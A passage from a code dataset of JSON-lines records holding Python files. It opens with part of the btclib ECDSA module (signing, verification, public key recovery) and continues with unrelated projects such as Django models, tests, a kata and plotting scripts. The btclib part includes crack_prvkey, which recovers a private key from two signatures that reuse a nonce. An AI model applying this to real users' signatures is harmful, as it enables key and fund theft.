ec, hf) # 1\n else:\n k = int_from_prvkey(k, ec)\n\n # second part delegated to helper function\n return __sign(c, q, k, low_s, ec)\n\n\ndef sign(\n msg: String,\n prvkey: PrvKey,\n low_s: bool = True,\n ec: Curve = secp256k1,\n hf: HashF = sha256,\n) -> DSASigTuple:\n \"\"\"ECDSA signature with canonical low-s preference.\n\n Implemented according to SEC 1 v.2\n The message msg is first processed by hf, yielding the value\n\n m = hf(msg),\n\n a sequence of bits of length *hlen*.\n\n Normally, hf is chosen such that its output length *hlen* is\n roughly equal to *nlen*, the bit-length of the group order *n*,\n since the overall security of the signature scheme will depend on\n the smallest of *hlen* and *nlen*; however, the ECDSA standard\n supports all combinations of *hlen* and *nlen*.\n\n RFC6979 is used for deterministic nonce.\n\n See https://tools.ietf.org/html/rfc6979#section-3.2\n \"\"\"\n\n m = reduce_to_hlen(msg, hf)\n return _sign(m, prvkey, None, low_s, ec, hf)\n\n\ndef __assert_as_valid(c: int, QJ: JacPoint, r: int, s: int, ec: Curve) -> None:\n # Private function for test/dev purposes\n\n w = mod_inv(s, ec.n)\n u = c * w % ec.n\n v = r * w % ec.n # 4\n # Let K = u*G + v*Q.\n KJ = _double_mult(v, QJ, u, ec.GJ, ec) # 5\n\n # Fail if infinite(K).\n # edge case that cannot be reproduced in the test suite\n assert KJ[2] != 0, \"invalid (INF) key\" # 5\n\n # affine x_K-coordinate of K\n x_K = (KJ[0] * mod_inv(KJ[2] * KJ[2], ec.p)) % ec.p\n # Fail if r ≠ x_K %n.\n if r != x_K % ec.n: # 6, 7, 8\n raise BTClibRuntimeError(\"signature verification failed\")\n\n\ndef _assert_as_valid(\n m: Octets, key: Key, sig: DSASig, ec: Curve = secp256k1, hf: HashF = sha256\n) -> None:\n # Private function for test/dev purposes\n # It raises Errors, while verify should always return True or False\n\n r, s = deserialize(sig, ec) # 1\n\n # The message m: a hlen array\n m = bytes_from_octets(m, hf().digest_size)\n c = _challenge(m, ec, hf) # 2, 3\n\n Q = point_from_key(key, ec)\n QJ = Q[0], Q[1], 1\n\n # second part delegated to helper function\n __assert_as_valid(c, QJ, r, s, ec)\n\n\ndef assert_as_valid(\n msg: String, key: Key, sig: DSASig, ec: Curve = secp256k1, hf: HashF = sha256\n) -> None:\n # Private function for test/dev purposes\n # It raises Errors, while verify should always return True or False\n\n m = reduce_to_hlen(msg, hf)\n _assert_as_valid(m, key, sig, ec, hf)\n\n\ndef _verify(\n m: Octets, key: Key, sig: DSASig, ec: Curve = secp256k1, hf: HashF = sha256\n) -> bool:\n \"\"\"ECDSA signature verification (SEC 1 v.2 section 4.1.4).\"\"\"\n\n # all kind of Exceptions are catched because\n # verify must always return a bool\n try:\n _assert_as_valid(m, key, sig, ec, hf)\n except Exception: # pylint: disable=broad-except\n return False\n else:\n return True\n\n\ndef verify(\n msg: String, key: Key, sig: DSASig, ec: Curve = secp256k1, hf: HashF = sha256\n) -> bool:\n \"\"\"ECDSA signature verification (SEC 1 v.2 section 4.1.4).\"\"\"\n\n m = reduce_to_hlen(msg, hf)\n return _verify(m, key, sig, ec, hf)\n\n\ndef recover_pubkeys(\n msg: String, sig: DSASig, ec: Curve = secp256k1, hf: HashF = sha256\n) -> List[Point]:\n \"\"\"ECDSA public key recovery (SEC 1 v.2 section 4.1.6).\n\n See also:\n https://crypto.stackexchange.com/questions/18105/how-does-recovering-the-public-key-from-an-ecdsa-signature-work/18106#18106\n \"\"\"\n\n m = reduce_to_hlen(msg, hf)\n return _recover_pubkeys(m, sig, ec, hf)\n\n\ndef _recover_pubkeys(\n m: Octets, sig: DSASig, ec: Curve = secp256k1, hf: HashF = sha256\n) -> List[Point]:\n \"\"\"ECDSA public key recovery (SEC 1 v.2 section 4.1.6).\n\n See also:\n https://crypto.stackexchange.com/questions/18105/how-does-recovering-the-public-key-from-an-ecdsa-signature-work/18106#18106\n \"\"\"\n\n # The message m: a hlen array\n hlen = hf().digest_size\n m = bytes_from_octets(m, hlen)\n\n c = _challenge(m, ec, hf) # 1.5\n\n r, s = deserialize(sig, ec)\n\n QJs = __recover_pubkeys(c, r, s, ec)\n return [ec._aff_from_jac(QJ) for QJ in QJs]\n\n\n# TODO: use __recover_pubkey to avoid code duplication\ndef __recover_pubkeys(c: int, r: int, s: int, ec: Curve) -> List[JacPoint]:\n # Private function provided for testing purposes only.\n\n # precomputations\n r_1 = mod_inv(r, ec.n)\n r1s = r_1 * s % ec.n\n r1e = -r_1 * c % ec.n\n keys: List[JacPoint] = []\n # r = K[0] % ec.n\n # if ec.n < K[0] < ec.p (likely when cofactor ec.cofactor > 1)\n # then both x_K=r and x_K=r+ec.n must be tested\n for j in range(ec.cofactor + 1): # 1\n # affine x_K-coordinate of K (field element)\n x_K = (r + j * ec.n) % ec.p # 1.1\n # two possible y_K-coordinates, i.e. two possible keys for each cycle\n try:\n # even root first for bitcoin message signing compatibility\n yodd = ec.y_even(x_K)\n KJ = x_K, yodd, 1 # 1.2, 1.3, and 1.4\n # 1.5 has been performed in the recover_pubkeys calling function\n QJ = _double_mult(r1s, KJ, r1e, ec.GJ, ec) # 1.6.1\n try:\n __assert_as_valid(c, QJ, r, s, ec) # 1.6.2\n except (BTClibValueError, BTClibRuntimeError):\n pass\n else:\n keys.append(QJ) # 1.6.2\n KJ = x_K, ec.p - yodd, 1 # 1.6.3\n QJ = _double_mult(r1s, KJ, r1e, ec.GJ, ec)\n try:\n __assert_as_valid(c, QJ, r, s, ec) # 1.6.2\n except (BTClibValueError, BTClibRuntimeError):\n pass\n else:\n keys.append(QJ) # 1.6.2\n except (BTClibValueError, BTClibRuntimeError): # K is not a curve point\n pass\n return keys\n\n\ndef __recover_pubkey(key_id: int, c: int, r: int, s: int, ec: Curve) -> JacPoint:\n # Private function provided for testing purposes only.\n\n # precomputations\n r_1 = mod_inv(r, ec.n)\n r1s = r_1 * s % ec.n\n r1e = -r_1 * c % ec.n\n # r = K[0] % ec.n\n # if ec.n < K[0] < ec.p (likely when cofactor ec.cofactor > 1)\n # then both x_K=r and x_K=r+ec.n must be tested\n j = key_id & 0b110 # allow for key_id in [0, 7]\n x_K = (r + j * ec.n) % ec.p # 1.1\n\n # even root first for Bitcoin Core compatibility\n i = key_id & 0b01\n y_even = ec.y_even(x_K)\n y_K = ec.p - y_even if i else y_even\n KJ = x_K, y_K, 1 # 1.2, 1.3, and 1.4\n # 1.5 has been performed in the recover_pubkeys calling function\n QJ = _double_mult(r1s, KJ, r1e, ec.GJ, ec) # 1.6.1\n __assert_as_valid(c, QJ, r, s, ec) # 1.6.2\n return QJ\n\n\ndef _crack_prvkey(\n m_1: Octets,\n sig1: DSASig,\n m_2: Octets,\n sig2: DSASig,\n ec: Curve = secp256k1,\n hf: HashF = sha256,\n) -> Tuple[int, int]:\n\n r_1, s_1 = deserialize(sig1, ec)\n r_2, s_2 = deserialize(sig2, ec)\n if r_1 != r_2:\n raise BTClibValueError(\"not the same r in signatures\")\n if s_1 == s_2:\n raise BTClibValueError(\"identical signatures\")\n\n # The message m: a hlen array\n hlen = hf().digest_size\n m_1 = bytes_from_octets(m_1, hlen)\n m_2 = bytes_from_octets(m_2, hlen)\n\n c_1 = _challenge(m_1, ec, hf)\n c_2 = _challenge(m_2, ec, hf)\n k = (c_1 - c_2) * mod_inv(s_1 - s_2, ec.n) % ec.n\n q = (s_2 * k - c_2) * mod_inv(r_1, ec.n) % ec.n\n return q, k\n\n\ndef crack_prvkey(\n msg1: String,\n sig1: DSASig,\n msg2: String,\n sig2: DSASig,\n ec: Curve = secp256k1,\n hf: HashF = sha256,\n) -> Tuple[int, int]:\n\n m_1 = reduce_to_hlen(msg1, hf)\n m_2 = reduce_to_hlen(msg2, hf)\n\n return _crack_prvkey(m_1, sig1, m_2, sig2, ec, hf)\n","sub_path":"btclib/dsa.py","file_name":"dsa.py","file_ext":"py","file_size_in_byte":12333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"315772916","text":"#!/usr/bin/env python3\n\nimport os, sys\nfrom graphics import Visualizer\nfrom graphics.variables import Split\n\nADDRESS = \"localhost\"\nPORT = os.environ.get(\"SERVER_PORT\", 11297)\n\nclass Visualize:\n def __init__(self, run_on_clock=True):\n walls = ('-w' in sys.argv or os.environ.get(\"WALLS\",False))\n walls = True\n pacman = ('-p' in sys.argv or os.environ.get(\"PACMAN\",False))\n pacman = True\n top = ('-t' in sys.argv or os.environ.get(\"TOP\",False))\n # top = True\n bottom = ('-b' in sys.argv or os.environ.get(\"BOTTOM\",False))\n # bottom = True\n split = Split.FULL\n if top:\n split = Split.TOP\n elif bottom:\n split = Split.BOTTOM\n self.visualizer = Visualizer(ADDRESS, PORT, walls, pacman, split, run_on_clock=run_on_clock)\n self.visualizer.run()\n\n# if __name__ == \"__main__\":\n# main()\n","sub_path":"2021-2022/fasterPacman/gameEngine/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"431814862","text":"#\nimport collections\nimport copy\nimport tables\nimport os\nimport ShareYourSystem as SYS\nimport sys\n#\n\n#\nBasingLocalTypeString=\"Merger\"\nBaseClass=getattr(SYS,SYS.getClassStringWithTypeString(BasingLocalTypeString))\n#\n\n#\nclass FeaturerClass(\n\t\t\t\t\tBaseClass\n\t\t\t\t):\n\t\n\t@Hooker.HookerClass(**{'HookingAfterVariablesList':[{'CallingVariable':BaseClass.__init__}]})\n\tdef init(self,**_KwargVariablesDict):\n\n\t\t#\n\t\tself.FeaturingAllBool=False\t\t\t\t\t\t\t\t\t\t#\n\t\t#\n\n\t@SYS.HookerClass(**{'HookingBeforeTuplesList':[(\"Rower\",\"model\")]})\n\tdef model(self,**_KwargVariablesDict):\n\n\t\t#Put all the GettingStringsList in the identifying container\n\t\tif self.FeaturingAllBool:\n\t\t\tself.RowedIdentifiedGettingStringsList=SYS.unzip(\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.ModelingColumnTuplesList,[0]\n\t\t\t\t\t\t\t\t\t\t\t\t\t)\n\t\t\tself.RowedNotIdentifiedGettingStringsList=[]\t\n\n#\n\n#\ndef attest_flush():\n\tFeaturer=SYS.FeaturerClass().update(\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t\t\t('MyInt',0),\n\t\t\t\t\t\t\t\t\t\t('MyString',\"hello\"),\n\t\t\t\t\t\t\t\t\t\t('MyIntsList',[2,4,1]),\n\t\t\t\t\t\t\t\t\t\t('ModelingColumnTuplesList',\n\t\t\t\t\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t\t\t\t\t('MyInt',tables.Int64Col()),\n\t\t\t\t\t\t\t\t\t\t\t\t('MyString',tables.StringCol(10)),\n\t\t\t\t\t\t\t\t\t\t\t\t('MyIntsList',(tables.Int64Col(shape=3)))\n\t\t\t\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\t\t\t\t('FeaturingAllBool',True)\n\t\t\t\t\t\t\t\t\t]).flush(\n\t\t\t\t\t\t\t\t\t).update(\n\t\t\t\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t\t\t\t('MyInt',1),\n\t\t\t\t\t\t\t\t\t\t\t('MyString',\"bonjour\"),\n\t\t\t\t\t\t\t\t\t\t\t('MyIntsList',[2,4,6])\n\t\t\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\t\t\t\t).flush(\n\t\t\t\t\t\t\t\t\t).hdfclose()\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t#Get the h5ls version of the stored hdf\n\treturn SYS.represent(\n\t\t\t\t\t\tFeaturer\n\t\t\t\t\t\t)+'\\n\\n\\n\\n'+Featurer.hdfview().HdformatedString\t\n#\n","sub_path":"Install/ShareYourSystem/Object/Featurer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"302411616","text":"# In this kata you have to create all permutations of an input string and remove duplicates, if present.\n# This means, you have to shuffle all letters from the input in all possible orders.\n\n# Examples:\n\n# permutations('a'); # ['a']\n# permutations('ab'); # ['ab', 'ba']\n# permutations('aabb'); # ['aabb', 'abab', 'abba', 'baab', 'baba', 'bbaa']\n\n# The order of the permutations doesn't matter.\n\ndef permutations(string):\n out = set([string])\n if len(string) == 2:\n out.add(string[1]+string[0])\n elif len(string) > 2:\n for k, m in enumerate(string):\n for i in permutations(string[:k] + string[k+1:]):\n out.add(m+i)\n return list(out)\n","sub_path":"4_kyu/Permutations.py","file_name":"Permutations.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"32642348","text":"import random\nfrom django.test import TestCase, override_settings\n\nfrom eahub.base.models import User\nfrom eahub.localgroups.models import LocalGroup, Organisership\nfrom eahub.profiles.models import CauseArea, Profile, ProfileAnalyticsLog\n\n\n@override_settings(IS_ENABLE_ALGOLA=False)\nclass ProfileTestCase(TestCase):\n def test_get_is_organiser(self):\n profile = create_profile(\"test@email.com\", \"User1\")\n\n local_group = LocalGroup()\n local_group.save()\n\n o = Organisership(user=profile.user, local_group=local_group)\n o.save()\n\n self.assertTrue(profile.get_is_organiser())\n\n def test_get_exportable_field_names(self):\n actual = Profile.get_exportable_field_names()\n\n expected_field_names = [\n \"id\",\n \"user\",\n \"slug\",\n \"is_public\",\n \"is_approved\",\n \"name\",\n \"image\",\n \"city_or_town\",\n \"country\",\n \"linkedin_url\",\n \"facebook_url\",\n \"personal_website_url\",\n \"lat\",\n \"lon\",\n \"cause_areas\",\n \"available_to_volunteer\",\n \"open_to_job_offers\",\n \"expertise_areas\",\n \"career_interest_areas\",\n \"available_as_speaker\",\n \"email_visible\",\n \"topics_i_speak_about\",\n \"organisational_affiliations\",\n \"summary\",\n \"giving_pledges\",\n \"legacy_record\",\n \"offering\",\n \"looking_for\",\n \"local_groups\",\n ]\n\n self.assertListEqual(expected_field_names, actual)\n\n def test_save_analytics_on_profile_creation(self):\n profile = create_profile(\"test@email.com\", \"User1\")\n\n analytics_logs = ProfileAnalyticsLog.objects.filter(profile=profile)\n\n analytics_logs_name = ProfileAnalyticsLog.objects.filter(\n profile=profile, field=\"name\"\n )\n analytics_logs_is_approved = ProfileAnalyticsLog.objects.filter(\n profile=profile, field=\"is_approved\"\n )\n analytics_logs_is_public = ProfileAnalyticsLog.objects.filter(\n profile=profile, field=\"is_public\"\n )\n analytics_logs_slug = ProfileAnalyticsLog.objects.filter(\n profile=profile, field=\"slug\"\n )\n analytics_logs_id = ProfileAnalyticsLog.objects.filter(\n profile=profile, field=\"id\"\n )\n analytics_logs_user_id = ProfileAnalyticsLog.objects.filter(\n profile=profile, field=\"user\"\n )\n analytics_logs_email_visible = ProfileAnalyticsLog.objects.filter(\n profile=profile, field=\"email_visible\"\n )\n\n self.assertEqual(\"User1\", analytics_logs_name.first().new_value)\n self.assertEqual(\"False\", analytics_logs_is_approved.first().new_value)\n self.assertEqual(\"True\", analytics_logs_is_public.first().new_value)\n self.assertEqual(\"user1\", analytics_logs_slug.first().new_value)\n self.assertEqual(str(profile.id), analytics_logs_id.first().new_value)\n self.assertEqual(str(profile.user), analytics_logs_user_id.first().new_value)\n self.assertEqual(\"False\", analytics_logs_email_visible.first().new_value)\n self.assertEqual(8, len(analytics_logs))\n self.assertTrue(all(x.action == \"Create\" for x in analytics_logs))\n self.assertTrue(\n all(\n x.action_uuid == analytics_logs.first().action_uuid\n for x in analytics_logs\n )\n )\n self.assertTrue(\n all(x.time == analytics_logs.first().time for x in analytics_logs)\n )\n\n def test_save_analytics_on_change(self):\n profile = create_profile(\"test@email.com\", \"User1\")\n\n profile.name = \"User1New\"\n profile.cause_areas = [CauseArea.BUILDING_EA_COMMUNITIES]\n profile.save()\n\n analytics_logs_name_updated = ProfileAnalyticsLog.objects.filter(\n profile=profile, field=\"name\", action=\"Update\"\n )\n\n analytics_logs_cause_area_updated = ProfileAnalyticsLog.objects.filter(\n profile=profile, field=\"cause_areas\", action=\"Update\"\n )\n\n analytics_logs_update = ProfileAnalyticsLog.objects.filter(\n profile=profile, action=\"Update\"\n )\n\n self.assertEqual(\"User1New\", analytics_logs_name_updated.first().new_value)\n self.assertEqual(\n str([\"Building EA communities\"]),\n analytics_logs_cause_area_updated.first().new_value,\n )\n self.assertEqual(2, len(analytics_logs_update))\n self.assertTrue(\n all(\n x.action_uuid == analytics_logs_update.first().action_uuid\n for x in analytics_logs_update\n )\n )\n self.assertTrue(\n all(\n x.time == analytics_logs_update.first().time\n for x in analytics_logs_update\n )\n )\n\n def test_has_community_details_returns_false_if_none(self):\n profile = create_profile(\"test@email.com\", \"peter\")\n\n self.assertFalse(profile.has_community_details())\n\n def test_has_community_details_returns_true_if_free_text_field_set(self):\n profile = create_profile(\"test@email.com\", \"peter\")\n\n field_names = [\"topics_i_speak_about\", \"offering\", \"looking_for\"]\n setattr(profile, random.choice(field_names), \"something\")\n\n self.assertTrue(profile.has_community_details())\n\n\ndef create_profile(email, username):\n user = User.objects.create(email=email)\n profile = Profile.objects.create(user=user, name=username)\n\n return profile\n","sub_path":"eahub/tests/test_profile_models.py","file_name":"test_profile_models.py","file_ext":"py","file_size_in_byte":5646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"13187124","text":"from django.db import models\nfrom dynamicfleet.veiculos.validators import validate_license, validate_year\n\n\nclass Vehicle(models.Model):\n\n STATES_CHOICES = [\n ('disponivel', 'Disponível'),\n ('manutencao', 'Manutenção')\n ]\n\n model = models.CharField('Modelo', max_length=128)\n license_plate = models.CharField('Placa', \n max_length=7, \n unique=True, \n validators=[validate_license])\n year = models.PositiveIntegerField('Ano', \n validators=[validate_year],\n default=2020)\n state = models.CharField('Estado', \n max_length=10, \n choices=STATES_CHOICES, \n default='disponivel')\n\n created = models.DateTimeField('Registrado em', auto_now_add=True)\n modified = models.DateTimeField('Modificado em', auto_now=True)\n\n class Meta:\n verbose_name = 'veículo'\n verbose_name_plural = 'veículos'\n\n def __str__(self):\n return '{} - {}'.format(self.model, self.license_plate)\n","sub_path":"dynamicfleet/veiculos/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"384213248","text":"# cook your dish here\r\nt=int(input())\r\nfor i in range(t):\r\n n=int(input())\r\n scores=[0]*11\r\n for j in range(n):\r\n p,s=map(int,input().split())\r\n if s>scores[p-1]:\r\n scores[p-1]=s\r\n print(sum(scores[:8]))","sub_path":"Beginner/That Is My Score!.py","file_name":"That Is My Score!.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"398190566","text":"# -*- coding: utf-8 -*-\n\"\"\"\n# Definition for a Node.\nclass Node(object):\n def __init__(self, val, children):\n self.val = val\n self.children = children\n\"\"\"\n\n\nclass Solution(object):\n def preorder(self, root):\n \"\"\"\n Solution: recursive\n Time: O(n)\n Space: O(n)\n Perf: Runtime: 688 ms, faster than 50.66% / Memory Usage: 107.5 MB, less than 84.36%\n :type root: Node\n :rtype: List[int]\n \"\"\"\n self.res = []\n self.helper(root)\n return self.res\n\n def helper(self, node):\n if node is None:\n return\n self.res.append(node.val)\n if node.children:\n for child in node.children:\n self.helper(child)\n return","sub_path":"Data Structure & Algorithm/Tree/589. N-ary Tree Preorder Traversal/recursive.py","file_name":"recursive.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"496931357","text":"\"\"\"Test main for edx-lint.\"\"\"\n\nimport os\nimport unittest\nimport re\n\ndef load_tests(unused_loader, tests, unused_pattern): # pylint: disable=unused-argument\n \"\"\"Loads tests for the pylint test loader.\n\n This function is automatically run by pylint's test runner, and is called\n with three arguments, two of which we don't need.\n\n \"\"\"\n # Have to import this in the function, because the module does\n # initialization on import! ugh.\n from pylint.testutils import LintTestUsingFile, linter, get_tests_info\n\n # Inline functions that was deleted from pylint core\n def cb_test_gen(base_class):\n \"\"\"Inlined from pylint\"\"\"\n def call(input_dir, msg_dir, module_file, messages_file, dependencies):\n \"\"\"Inlined from pylint\"\"\"\n class LintTC(base_class):\n \"\"\"Inlined from pylint\"\"\"\n module = module_file.replace('.py', '')\n output = messages_file\n depends = dependencies or None\n INPUT_DIR = input_dir\n MSG_DIR = msg_dir\n return LintTC\n return call\n\n def make_tests(input_dir, msg_dir, filter_rgx, callbacks):\n \"\"\"generate tests classes from test info\n\n return the list of generated test classes\n \"\"\"\n if filter_rgx:\n is_to_run = re.compile(filter_rgx).search\n else:\n is_to_run = lambda x: 1\n tests = []\n for module_file, messages_file in (\n get_tests_info(input_dir, msg_dir, 'func_', '')\n ):\n if not is_to_run(module_file) or module_file.endswith(('.pyc', \"$py.class\")):\n continue\n base = module_file.replace('func_', '').replace('.py', '')\n\n dependencies = get_tests_info(input_dir, msg_dir, base, '.py')\n\n for callback in callbacks:\n test = callback(input_dir, msg_dir, module_file, messages_file,\n dependencies)\n if test:\n tests.append(test)\n return tests\n\n\n # Load our plugin.\n linter.load_plugin_modules(['edx_lint.pylint'])\n\n here = os.path.dirname(os.path.abspath(__file__))\n\n tests = make_tests(\n input_dir=os.path.join(here, 'input'),\n msg_dir=os.path.join(here, 'messages'),\n filter_rgx=None,\n callbacks=[cb_test_gen(LintTestUsingFile)],\n )\n\n cls = unittest.TestSuite\n return cls(unittest.makeSuite(test, suiteClass=cls) for test in tests)\n","sub_path":"test/test_pylint_plugins.py","file_name":"test_pylint_plugins.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"437199920","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 27 17:42:22 2013\n\n@author: Wojtek\n\"\"\"\nfrom numpy import loadtxt\nimport os\n\nimport matplotlib.pyplot as plt\n# from matplotlib.font_manager import FontProperities\n\nfig = plt.figure(figsize=(20, 16))\n# figure(1, figsize=(6, 4.5))\n\nt, x1, x2 = loadtxt('x.dat', unpack=True)\nplotX = fig.add_subplot(3, 2, 1)\n# figure(1, figsize=(6, 4.5))\n# plotX.set_xlabel('t[m]')\nplotX.set_ylabel(r'$x_s$[m]')\nplotX.grid(True)\nplotX.hold(True)\nplotX.lw = 1\nplotX.plot(t, x1, 'r', linewidth=plotX.lw)\nplotX1 = plotX.twinx()\nplotX1.plot(t, x2, 'g', linewidth=plotX.lw)\nplotX1.set_ylabel(r'$x_t$[m]')\nplotX.legend((r'$x_s$', r'$x_t$'), loc=2)\nplotX1.legend((r'$x_t$',), loc=4)\nplotX.set_title(u'Przemieszczenie suwaka i tloczyska')\n# fig.savefig('x.png', dpi=150)\nprint(\".\")\n\nt, y1, y2 = loadtxt('y.dat', unpack=True)\n# figure(1, figsize=(6, 4.5))\nplotY = fig.add_subplot(3, 2, 2)\n# plotY.set_xlabel('t[s]')\nplotY.set_ylabel('v[m/s]')\nplotY.grid(True)\nplotY.hold(True)\nplotY.lw = 1\nplotY.plot(t, y1, 'r', linewidth=plotY.lw)\nplotY.plot(t, y2, 'g', linewidth=plotY.lw)\nplotY.legend((r'$v_s$', r'$v_t$'))\nplotY.set_title(u'Predkosc suwaka i tloczyska')\n# savefig('y.png', dpi=150)\nprint(\".\" * 2)\n\nt, p1, p2, p3 = loadtxt('p.dat', unpack=True)\n# figure(1, figsize=(6, 4.5))\nplotP = fig.add_subplot(3, 2, 3)\n# plotP.set_xlabel('t[s]')\nplotP.set_ylabel('p[Pa]')\nplotP.grid(True)\nplotP.hold(True)\nplotP.lw = 1\nplotP.plot(t, p1, 'r', linewidth=plotP.lw)\nplotP.plot(t, p2, 'g', linewidth=plotP.lw)\nplotP.plot(t, p3, 'b', linewidth=plotP.lw)\nplotP.legend((r'$p_1$', r'$p_2$', r'$p_3$'))\nplotP.set_title(u'Cisnienia')\n# savefig('p.png', dpi=150)\nprint(\".\" * 3)\n\nt, Fhs, Fts, Fss, Fds, Fht, Ftt, El1, El2 = loadtxt('FList.dat', unpack=True)\n# figure(1, figsize=(6, 4.5))\nplotF = fig.add_subplot(3, 2, 4)\nplotF.set_xlabel('t[s]')\nplotF.set_ylabel('F[N]')\nplotF.grid(True)\nplotF.hold(True)\nplotF.lw = 1\nplotF.plot(t, Fhs, 'r', linewidth=plotF.lw)\nplotF.plot(t, Fts, 'g', linewidth=plotF.lw)\nplotF.plot(t, Fss, 'b', linewidth=plotF.lw)\nplotF.plot(t, Fds, 'c', linewidth=plotF.lw)\nplotF.plot(t, Fht, 'm', linewidth=plotF.lw)\nplotF.plot(t, Ftt, 'y', linewidth=plotF.lw)\nplotF.legend((r'$F_{hs}$', r'$F_{ts}$', r'$F_{ss}$', r'$F_{ds}$', r'$F_{ht}$', r'$F_{tt}$',))\nplotF.set_title(u'F')\nprint(\".\" * 4)\n\nt, Q1, Q2, Q3, Q4, Q5, Qp, Qz1, Sroz = loadtxt('QList.dat', unpack=True)\n# figure(1, figsize=(6, 4.5))\nplotQ = fig.add_subplot(3, 2, 5)\nplotQ.set_xlabel('t[s]')\nplotQ.set_ylabel('Q[m3/s]')\nplotQ.grid(True)\nplotQ.hold(True)\nplotQ.lw = 1\nplotQ.plot(t, Q1, 'r', linewidth=plotQ.lw)\nplotQ.plot(t, Q2, 'g', linewidth=plotQ.lw)\nplotQ.plot(t, Q3, 'b', linewidth=plotQ.lw)\nplotQ.plot(t, Q4, 'c', linewidth=plotQ.lw)\nplotQ.plot(t, Q5, 'm', linewidth=plotQ.lw)\nplotQ.plot(t, Qp, 'y', linewidth=plotQ.lw)\nplotQ.plot(t, Qz1, 'k', linewidth=plotQ.lw)\nplotQ.legend((r'$Q_1$', r'$Q_2$', r'$Q_3$', r'$Q_4$', r'$Q_5$', r'$Q_p$', r'$Q_{z1}$'), loc=4)\nplotQ.set_title(u'Q')\n\nplotTmp = fig.add_subplot(3, 2, 6)\nplotTmp.set_xlabel('t[s]')\nplotTmp.set_ylabel('El')\nplotTmp.grid(True)\nplotTmp.hold(True)\nplotTmp.lw = 1\n# plotTmp.plot(t, El1, 'r', linewidth=plotTmp.lw)\n# plotTmp.plot(t, El2, 'g', linewidth=plotTmp.lw)\nplotTmp.plot(t, Sroz, 'b', linewidth=plotTmp.lw)\nplotTmp.legend((\n # r'$El_1$',\n # r'$El_2$',\n r'$Sroz$',))\nplotTmp.set_title(u'El')\n# savefig('tmp.png', dpi=150)\nfig.savefig('x.png', dpi=300)\nprint(\".\" * 5)\nprint(\"Done!\")\nos.system(\"start \" + 'x.png')\n","sub_path":"doc/chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"578742394","text":"\"\"\"\n This file contains the main program to read data, run classifiers and print results.\n Please DO NOT modify any functions in this file other than the main function.\n\n To run the main.py file from command line, simply navigate to the directory where main.py resides, and type:\n python main.py PATH_TO_DATASET\n\n The two datasets are available in the /course/cs1420/data/hw3 folder, named digits.csv and fishiris.csv.\n Copy these two files to your hw3 folder, PATH_TO_DATASET should be the relative path to the csv files.\n\n\"\"\"\nimport sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom collections import namedtuple\nimport random\nfrom sklearn.model_selection import train_test_split\n\nfrom models import KmeansClassifier, KNeighborsClassifier, DecisionTree\n\n\ndef plot_KNN(data, N_NEIGHBORS=6, h=0.02):\n \"\"\"\n This is a helper function that trains the Iris data to a KNN classifier and produce a 2D plot of the\n classification graph showing decision boundaries.\n\n The x and y axis of the graph is the first two features of inputs in order to produce a 2D plot.\n In the iris dataset, \"Sepal length\" and \"Sepal width\" are the first two features.\n\n The other features are discarded in both training and prediction.\n\n :param data: a namedtuple including inputs and labels, used in both training and ploting\n :param N_NEIGHBORS: number of neighbors to use for knn classifier\n :param h: step size of x and y axis in meshgrid\n :return: None\n \"\"\"\n # Check if data has at least two features\n if len(data.inputs[0]) < 2:\n print(\"Number of features is less than 2!\")\n return\n # Check if NUM_NEIGHBORS is a positive integer\n if isinstance(N_NEIGHBORS, int) == False:\n print(\"Invalid input! Number of neighbors must be an integer!\")\n return\n elif N_NEIGHBORS <= 0:\n print(\"Invalid input! Number of neighbors must be greater than zero!\")\n return\n\n # Create color maps\n cmap_light = ListedColormap(['#FFAAAA', '#AAFFAA', '#00AAFF']) # used to show decision boundaries\n cmap_bold = ListedColormap(['#FF0000', '#00FF00', '#00AAFF']) # used to mark true labels of data points\n\n X = data.inputs[:, :2]\n y = data.labels\n\n # calculate min, max and limits\n x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n\n model = KNeighborsClassifier(N_NEIGHBORS)\n model.train(X, y)\n Z = model.predict(np.c_[xx.ravel(), yy.ravel()])\n\n # Put the result into a color plot\n Z = Z.reshape(xx.shape)\n plt.figure()\n plt.pcolormesh(xx, yy, Z, cmap=cmap_light)\n\n # Plot also the training points\n plt.scatter(X[:, 0], X[:, 1], c=y, cmap=cmap_bold)\n plt.xlabel('Sepal length')\n plt.ylabel('Sepal width')\n plt.xlim(xx.min(), xx.max())\n 